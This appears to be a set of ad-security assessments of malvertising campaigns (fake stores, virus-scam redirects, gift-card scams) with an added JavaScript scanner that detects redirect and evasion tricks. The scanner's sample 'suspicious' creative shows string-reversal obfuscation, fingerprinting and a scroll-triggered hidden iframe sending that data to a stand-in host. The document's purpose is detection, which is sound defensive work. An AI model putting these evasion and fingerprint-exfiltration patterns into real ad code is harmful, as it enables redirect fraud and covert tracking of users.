Assessment: We have identified a new scam ad campaign posing as a clothing store and luring customers with steep discounts and seemingly legitimate product catalogs. Once a purchase has been made, the operators ship low-quality products or nothing at all. They also collect financial information such as credit card numbers and other bank details, which can be used for further fraud. Their customer service and refund policies also indicate a scam. Because of these issues, we have added this campaign to our blocklist.

Affected Platforms: Google Ad Exchange

Ad Image:

Landing page:

Assessment: Over the past week, Boltive observed a malicious redirect campaign driving users to a fake landing page or an iPhone virus scam. The malicious ads used evasion techniques such as string reversal and string concatenation to avoid detection. Under favorable technical conditions the ads perform the redirect; otherwise they appear benign, with no suspicious behavior indicators.

Affected Platform: Pubmatic

Assessment: Desktop redirect campaign impacting 1,300 domains. The malicious code relied on user input (such as a click or scroll) to trigger the redirect. While this tactic is not new, it is a strategy that has been dormant for much of the year. Users were shown a fake McAfee antivirus popup prompting them to download further malicious code. The malicious ad code also attempted to remove important functionality from both the ad frame and the main frame, which means that even when the redirect did not fire, there was a risk that the page itself could break.

Interestingly, this campaign showed more sophistication in the code, collecting real-time data for analysis. Fraudsters added random sampling of the ads, indicating that they expected large volumes of traffic and planned to optimize their campaigns based on what they learned. The campaign, like many others, looked for the presence of blocking wrappers, in this case ADL and two other competitors. This is something we expect and have protection against, a nuance that all publishers/platforms should confirm with their providers.

Affected platforms: Early intelligence pointed to ReklamStore as the source of the redirects; however, ADL confirmed that Yieldmo was in fact the platform most impacted by this outbreak.

Assessment:

This malicious campaign has two methods of triggering the redirect. The first writes a script tag that loads a jQuery file from http://ajax.googleapis.com, then runs a function that replaces all parts of the URL to build the malicious payload and sends along fingerprinting information (screen width/height, platform, user agent, color depth, number of plugins, timestamp, etc.). The second loads a hidden iframe whose source executes JavaScript that attempts a top.location.replace.

The ad loaded alongside this malicious payload is a simple image (either a logo or a stolen Amazon Fire TV Stick ad) that actually takes the user to an Amazon listing for a Fire TV Stick.

There appear to be two different campaigns active at the moment: one leading to healthnotetoday(dot)com and the other leading to various gift card scam pages.
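As an added example (not Boltive's or ADL's own detection code), the following heuristic scanner flags the indicators described across these assessments: string reversal and concatenation, top.location.replace, hidden iframes, input-gated triggers and fingerprinting. The rule weights, verdict thresholds and the two sample creatives are constructed for illustration.

```javascript
// Heuristic static scanner for ad-creative JavaScript (added example, not Boltive/ADL code);
// rule ids mirror the assessments above, weights and thresholds are a constructed scheme.
// Undo two cheap evasions before matching: join concatenated literals ('loc' + 'ation' ->
// "location") and append the reversed form of every literal of 6+ chars in a trailing comment.
function normalize(src) {
  let out = src, prev;
  do {
    prev = out;
    out = out.replace(/(['"])([^'"\n]*)\1\s*\+\s*(['"])([^'"\n]*)\3/g, '"$2$4"');
  } while (out !== prev);
  return out.replace(/(['"])([^'"\n]{6,})\1/g,
    (lit, _q, s) => `${lit} /*rev:${s.split('').reverse().join('')}*/`);
}
// Fingerprinting signals; three or more distinct ones in a creative count as a hit.
const FP_SIGNALS = [/screen\.width/, /screen\.height/, /screen\.colorDepth/,
  /navigator\.platform/, /navigator\.userAgent/, /navigator\.plugins\.length/];
const RULES = [
  { id: 'top-frame-navigation', weight: 5, match: t => /top\s*\.\s*location\s*(\.\s*replace|=)/.test(t) },
  { id: 'string-reverse', weight: 2, match: t => /\.reverse\s*\(\s*\)\s*\.join\s*\(/.test(t) },
  { id: 'hidden-iframe', weight: 3, match: t => /createElement\s*\(\s*['"]iframe['"]/.test(t)
      && /display\s*=?\s*['":]\s*none|visibility\s*=?\s*['":]\s*hidden/.test(t) },
  { id: 'remote-script-injection', weight: 2, match: t => /document\.write\s*\(/.test(t) && /<script/i.test(t) },
  { id: 'user-event-gate', weight: 2, match: t =>
      /addEventListener\s*\(\s*['"](click|scroll|touchstart|mousemove)['"]/.test(t) && /location/.test(t) },
  { id: 'fingerprinting', weight: 2, match: t => FP_SIGNALS.filter(re => re.test(t)).length >= 3 },
];
// Returns matched rule ids, the summed score and a verdict for the ad-ops review queue.
function scanCreative(src) {
  const text = normalize(src);
  const matched = RULES.filter(r => r.match(text));
  const score = matched.reduce((sum, r) => sum + r.weight, 0);
  return { hits: matched.map(r => r.id), score,
           verdict: score >= 5 ? 'block' : score >= 3 ? 'review' : 'allow' };
}
// Constructed samples. The suspicious one only carries the indicators for the scanner to
// find: it performs no navigation and points at a reserved example domain.
const BENIGN_CREATIVE = `
var a = document.createElement('a');
a.href = 'https://advertiser.example/landing';
a.innerHTML = '<img src="banner.png" width="300" height="250">';
document.body.appendChild(a);`;
const SUSPICIOUS_CREATIVE = `
var k = 'ecalper.noitacol.pot'.split('').reverse().join('');
var fp = [screen.width, screen.height, navigator.platform, screen.colorDepth].join('|');
var f = document.createElement('iframe'); f.style.display = 'none';
window.addEventListener('scroll', function () { f.src = 'https://payload.example/?' + fp; });`;
console.log(scanCreative(SUSPICIOUS_CREATIVE).verdict, scanCreative(BENIGN_CREATIVE).verdict);
```

A scanner like this is a triage aid for the creative review queue, not a replacement for runtime behavioral blocking, since a creative can fetch its real logic later.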

Affected Platforms: GumGum (buyer has been blocked) & Between Digital

Assessment: Fraudsters hosting obfuscated scripts on AWS and Yahoo platforms attempted to deliver malicious redirects to over 300 different domains. To date, over 600M bad ads have been stopped and remonetized, primarily on mobile devices.

Affected Platforms: inMobi